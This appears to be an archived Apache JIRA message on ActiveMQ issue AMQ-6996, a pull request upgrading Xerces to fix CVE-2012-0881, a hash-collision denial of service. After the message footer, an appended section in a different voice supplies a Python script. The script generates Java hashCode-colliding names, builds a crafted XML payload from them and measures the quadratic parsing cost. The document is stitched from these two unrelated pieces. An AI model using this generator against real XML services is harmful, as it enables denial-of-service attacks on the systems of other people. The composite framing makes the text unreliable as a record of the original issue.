Posted to issues@activemq.apache.org by "ASF GitHub Bot (JIRA)" <ji...@apache.org> on 2018/07/22 18:37:00 UTC

[jira] [Commented] (AMQ-6996) ActiveMQ 5.15.4 xercesImpl-2.11.0.jar which has one high severity CVE against it.

    [ https://issues.apache.org/jira/browse/AMQ-6996?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16552117#comment-16552117 ] 

ASF GitHub Bot commented on AMQ-6996:
-------------------------------------

GitHub user jgoodyear opened a pull request:

    https://github.com/apache/activemq/pull/291

    [AMQ-6996] Update AMQ to use Xerces 2.12.0

    Update targeted for master (5.16.x).

You can merge this pull request into a Git repository by running:

    $ git pull https://github.com/jgoodyear/activemq AMQ-6996

Alternatively you can review and apply these changes as the patch at:

    https://github.com/apache/activemq/pull/291.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

    This closes #291
    
----
commit 38a9c00f51597d7814939a2b423eeb657add3a3d
Author: jgoodyear <ja...@...>
Date:   2018-07-22T18:32:09Z

    [AMQ-6996] Update AMQ to use Xerces 2.12.0

----


> ActiveMQ 5.15.4 xercesImpl-2.11.0.jar which has one high severity CVE against it.
> ---------------------------------------------------------------------------------
>
>                 Key: AMQ-6996
>                 URL: https://issues.apache.org/jira/browse/AMQ-6996
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker, webconsole
>    Affects Versions: 5.15.4
>         Environment: Customer environment is a mix of Linux and Windows, Gig-LAN (Medical & Financial services). Will not accept the risk of having even one high severity CVE in their environment. The cost of (SOX/HIPAA) insurance is too high to allow even one CVE with newly deployed systems.
>            Reporter: Albert Baker
>            Priority: Blocker
>
> ActiveMQ 5.15.4 ships xercesImpl-2.11.0.jar, which has one high-severity CVE against it.
> Discovered by adding OWASP Dependency-Check into the ActiveMQ pom.xml and running the OWASP report.
> CVE-2012-0881 Severity: High, CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
> CWE: CWE-399 Resource Management Errors
> Apache Xerces2 Java allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.
> CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=787104
> MLIST - [oss-security] 20140708 Summer bug cleaning - some Hash DoS stuff
> Vulnerable Software & Versions:
> cpe:/a:apache:xerces2_java:2.11.0 and all previous versions



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
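As an added illustration of the vulnerability class named in the report (hash-table collisions triggered by a crafted XML message), not code from the issue, the pull request or the ActiveMQ project: the Python below generates names that all share one Java String.hashCode() value, wraps them in a constructed XML document, and counts the string comparisons a chained hash table with no collision defence performs while inserting them. It assumes, for illustration only, that the parser keys such a table on the Java hash of the names it reads; which Xerces structure was affected and how 2.12.0 changes it are not reproduced here.

```python
"""Added example: Java hashCode collisions as an XML-parser CPU DoS primitive.

Assumption (for illustration): the parser keys a chained hash table on the
Java String.hashCode() of element/attribute names it encounters.
"""
from typing import Dict, List


def java_string_hash(s: str) -> int:
    """Java's String.hashCode(): h = 31*h + c over UTF-16 units, as a signed
    32-bit int. Assumes BMP characters, where ord(ch) equals the UTF-16 unit."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - (1 << 32) if h >= (1 << 31) else h


def colliding_names(n_pairs: int) -> List[str]:
    """Return 2**n_pairs distinct strings with an identical Java hashCode.

    "Aa" and "BB" both hash to 2112. Because hashCode is a polynomial in the
    characters, concatenating n_pairs such two-character blocks in any order
    yields the same hash, so every generated name lands in the same bucket.
    """
    blocks = ["Aa", "BB"]
    names = [""]
    for _ in range(n_pairs):
        names = [prefix + block for prefix in names for block in blocks]
    return names


def distinct_names(count: int) -> List[str]:
    """Benign comparison set: names that do not collide ("a0", "a1", ...)."""
    return [f"a{i}" for i in range(count)]


def crafted_xml(names: List[str]) -> str:
    """Constructed payload: one element carrying every name as an attribute."""
    attrs = " ".join(f'{name}="x"' for name in names)
    return f"<root {attrs}/>"


def probes_to_insert(names: List[str], buckets: int = 1 << 16) -> int:
    """Insert names into a chained table with no collision defence and return
    the number of string comparisons made. With every key in one chain the
    i-th insert scans i entries, so the total grows as N*(N-1)/2."""
    table: Dict[int, List[str]] = {}
    probes = 0
    for name in names:
        chain = table.setdefault(java_string_hash(name) % buckets, [])
        for existing in chain:
            probes += 1
            if existing == name:
                break
        else:
            chain.append(name)
    return probes


if __name__ == "__main__":
    crafted = colliding_names(10)          # 1024 names, a single hash value
    benign = distinct_names(len(crafted))  # same count, spread across buckets
    print("colliding names:", probes_to_insert(crafted), "comparisons")
    print("distinct names: ", probes_to_insert(benign), "comparisons")
    print(crafted_xml(crafted[:3]))
```

The quadratic count is the whole attack: doubling the number of colliding names quadruples the work the parser does, while the document itself only doubles in size. Any version check in your own build should therefore gate on the dependency (xercesImpl below 2.12.0 here), not on message size limits alone.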